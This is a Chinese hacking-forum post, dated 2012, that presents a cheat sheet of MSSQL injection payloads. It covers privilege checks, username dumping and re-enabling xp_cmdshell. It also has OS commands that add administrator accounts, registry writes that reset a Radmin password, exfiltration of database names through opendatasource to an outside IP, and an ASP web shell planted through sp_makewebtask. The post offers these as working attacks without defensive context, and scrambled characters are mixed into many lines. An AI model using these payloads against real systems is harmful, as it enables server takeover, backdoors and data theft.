找回密码
 立即注册
查看: 2747|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
9 i% Y7 E" Z, f! kand 1=(Select IS_MEMBER('db_owner')), H$ b$ M4 Z( T* ^; G$ i; T: J
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--% d3 B* f- B7 f5 x& \% `
, k; j3 @" s5 E( i
//检测是否有读取某数据库的权限$ a7 a# C2 J+ x0 z1 U
and 1= (Select HAS_DBACCESS('master')); f' k, b) d: s) v* N- v/ I
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
& O" r5 S9 u. W5 m8 y/ `0 K
- _  w% y6 @  p1 i2 m
( f+ ^' x5 C5 U! c4 N数字类型
# O2 S  r5 h0 b/ O8 C+ F! Vand char(124)%2Buser%2Bchar(124)=0- B& Y) Y- M" X3 P: @
* B( B7 @- }4 e; U
字符类型
- ~/ L! [! b6 f  c  O6 j6 j' and char(124)%2Buser%2Bchar(124)=0 and ''='6 z% {8 [/ ?+ L

3 M" }# g+ f' x+ ?" |+ v搜索类型4 q5 J2 B, @& J) n8 _0 o
' and char(124)%2Buser%2Bchar(124)=0 and '%'='3 F: I6 y/ ~0 p. s. Y9 t4 _7 H* i

) i& P4 x$ I6 A  Y& V5 z0 A6 X爆用户名2 z" A; O( ?' S. M7 T4 S3 _
and user>0, T2 [8 J3 y* u
' and user>0 and ''='4 D8 J0 s+ P7 Y5 Y9 Z

2 [3 i, L0 Y  y" o3 R检测是否为SA权限3 ~7 ~7 {' X+ K6 _/ w5 _  ?( \
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--, {# m# U- R# C2 Q( W3 E* a3 v' b
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --1 Q1 I' Q  k" A& ^4 m  w! H

$ _( b" [2 O7 i# W- w- U! R% X  r# \检测是不是MSSQL数据库; Y; E. K+ J- I+ d; A; s
and exists (select * from sysobjects);--7 H8 `8 |& q, x: z( s  I# ~* M1 j

8 `3 Q9 T* n, i( v! Z7 n检测是否支持多行6 A( M& w, b) B$ i7 }
;declare @d int;--
; Q( G- E: O. Y/ `+ f" j8 o7 G; B9 {' U. g  [2 h; a. }
恢复 xp_cmdshell
5 ~3 m; y+ z8 C$ F5 U7 b& N;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--' p( @3 `% R- S  d

' p' F+ q1 ?4 Q4 T& Z; ]! D
: O3 a% t, I" ]0 r, M4 Dselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')& X+ s6 l5 J+ Q: F& C$ D
+ @9 b1 ^% A( z* b/ D, F
//-----------------------
- l% @2 m) o2 ], b//       执行命令
/ u- S" T' k; Y//-----------------------) v1 F& p- ?: s  O; P4 B$ D) J6 X
首先开启沙盘模式:
0 F7 _$ y0 X8 l8 |5 [% c' V9 L7 F4 aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1) ]5 D; f- _! J! j& f
* c9 ?  P7 n# _/ V& ^' P6 k
然后利用jet.oledb执行系统命令( r) [3 D2 U1 E( P/ ?1 Q2 k
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')& o  R, _# f# |

7 L' `% q, |0 u1 L6 k% k6 W执行命令, Z- h- I1 \% k
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--& S! I) w- v& p+ w, h; a: _- t6 D: m
9 i+ N2 D0 d$ Q5 ~' V( N9 ^
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
: ^. q! c, g5 V& l; o  [
, A2 b. u: p! B- l: L" k' i% F判断xp_cmdshell扩展存储过程是否存在:
' }6 z( U- o& j% g. _http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
3 p$ X+ ~6 d$ N) e  C- P. L* k$ A% g' S6 U5 ?( J
写注册表5 x& q: O" G# B$ c
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1* s. v2 ~/ f# ^0 v, G

/ Y; S* a) y4 c  @/ `REG_SZ. r4 a& ]5 f8 _/ ?$ ]. v+ h9 m

0 w! t# v8 d2 p! {- O8 |0 w7 H* a读注册表
. @2 A7 P* e2 A7 [2 \. \2 ?exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
+ q! e7 |& ]0 J& Z1 W- _- W. _) G2 i& {- @
读取目录内容! n/ h8 D! f; F: F/ V
exec master..xp_dirtree 'c:\winnt\system32\',1,1
( i2 D: E- e5 J* r- w, c4 Y3 W. b9 t8 [4 o+ I

/ ]9 N2 C) a& k数据库备份( M" `& K: V: E! E; y
backup database pubs to disk = 'c:\123.bak'
$ Q6 @' |7 G$ b( A+ X. O
( Q8 H: X% K' Y: e4 [0 f//爆出长度. l2 U' r0 E) ~0 b' F' E% }$ i
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--4 d" g3 ]$ {1 y- K+ \% J1 d

' y9 ]& o) |$ n! [8 d/ e8 M4 x0 d3 ]: Y3 T
  I% F" y- ^2 A0 ^2 `/ C
更改sa口令方法:用sql综合利用工具连接后,执行命令:
+ Y+ w, P% m; b' v" }( Eexec sp_password NULL,'新密码','sa'* f. E* T4 W  X; _: \0 n2 }

2 X* g6 C/ a! W$ v- f添加和删除一个SA权限的用户test:
& q8 K) {, a3 |) h# q% pexec master.dbo.sp_addlogin test,9530772' d* _' w2 ?* Z* ?! M* Y
exec master.dbo.sp_addsrvrolemember test,sysadmin5 U; R# H8 r7 T' {

0 L) L0 z. x, U. J: e* W9 Z4 ?删除扩展存储过过程xp_cmdshell的语句:
' k0 Z' X' ]- texec sp_dropextendedproc 'xp_cmdshell'; }+ f3 N  ~, k
( b1 f5 F) x! q& S1 ]2 |7 Y
添加扩展存储过过程
/ h  q# m5 p8 z" M# p0 IEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
/ T1 {" R9 B. m0 |" W  m& a6 o1 _& HGRANT exec On xp_proxiedadata TO public9 _" H6 A* R( N, H% U6 l

$ Z0 @0 }  Q! [$ e! ~3 a* k7 V/ q9 T! W
停掉或激活某个服务。  F# q" n* c% A1 |2 H

' P) H' t/ j. i. s2 n0 J8 Q5 p" Cexec master..xp_servicecontrol 'stop','schedule'
6 V( B( x: Y8 r/ g* a/ ?exec master..xp_servicecontrol 'start','schedule'9 {6 h1 C% ^' X

8 [% X1 i- O; a( Q& ?2 K+ R6 Kdbo.xp_subdirs2 T" j! I/ S1 m  h& @0 F
/ Z1 Y; h- n- B7 O. C" t6 q
只列某个目录下的子目录。! |5 I7 I5 H9 W: A$ [
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'4 j3 p( u3 r( R/ x
9 q& W. z( G$ {5 U4 D
dbo.xp_makecab
( V) ]- {% p* W! z1 G- C9 T
6 b* Z' x% p2 X3 D3 X: c- e将目标多个档案压缩到某个目标档案之内。# n# T( Y1 M2 d$ F* Q8 M
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。0 d! P. j! k% x% I" v" q. D# L; l

7 t, U! A9 s$ I' h) ]5 A7 o% Wdbo.xp_makecab/ ^$ Z0 X+ S. S% T1 D$ K8 n
'c:\test.cab','mszip',1,1 E3 t( O7 h8 A+ E
'C:\Inetpub\wwwroot\SQLInject\login.asp',7 A7 I$ O: [7 v/ Y8 C0 i
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
7 M) P* |  I/ n1 _& d$ c1 D' V, [
& g' F9 `0 z# Vxp_terminate_process3 L! T0 \. R4 @' q& ]# X* m
4 u' I4 ]. Y4 \6 v" _& \
停掉某个执行中的程序,但赋予的参数是 Process ID。  q# [( D( A) ~  C! n) w$ i
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
" O! d1 K8 W0 E. i$ O( z
/ o( c2 `- T. R. n# f, M- jxp_terminate_process 2484/ W5 g) O$ m2 P; |' H4 S8 a: @
6 k- q# Y( M0 ^* Y
xp_unpackcab
3 {1 T9 a1 J7 ^5 z2 a+ m; ^
1 G# r  I; B/ c- o解开压缩档。7 D( l  |5 N0 k* W. j

4 S! p3 G2 q( C; V3 w& z& hxp_unpackcab 'c:\test.cab','c:\temp',1- z0 W2 r5 p* p4 A$ m

9 t3 k8 m) {: d/ X4 j* T. [. h8 L
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
! ~3 m. ~+ v/ u; L; \, |' Y8 ^  D9 o7 ]
create database lcx;. x' k+ q8 M9 ~8 L$ X
Create TABLE ku(name nvarchar(256) null);( \$ w9 }% u8 A/ N
Create TABLE biao(id int NULL,name nvarchar(256) null);  X" X4 J" s6 ]

, F; b4 v6 L: m5 G+ f9 c//得到数据库名
, c: V: r! B7 c" ]* Xinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases) z! l. i! [6 }' q  _

2 P0 W6 J' k3 t  C1 @% I4 h9 s( ?: x1 h/ Q. E) `# C' ^3 g7 {
//在Master中创建表,看看权限怎样2 }# t( l  r1 |( D
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
2 g0 [6 s$ p( k) E4 m7 i) H: a, H9 q
用 sp_makewebtask直接在web目录里写入一句话马:& q0 a4 E1 V9 Q+ R
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 [! k. D8 `: s9 x2 U: q. A9 h1 H$ t- r! a% y
//更新表内容9 X, V7 K; j# X- j- C# @
Update films SET kind = 'Dramatic' Where id = 123
, b# J6 ~4 J+ U
! z$ m2 @4 w, _5 w+ d9 A; l//删除内容
* a* B3 m& F. ?delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表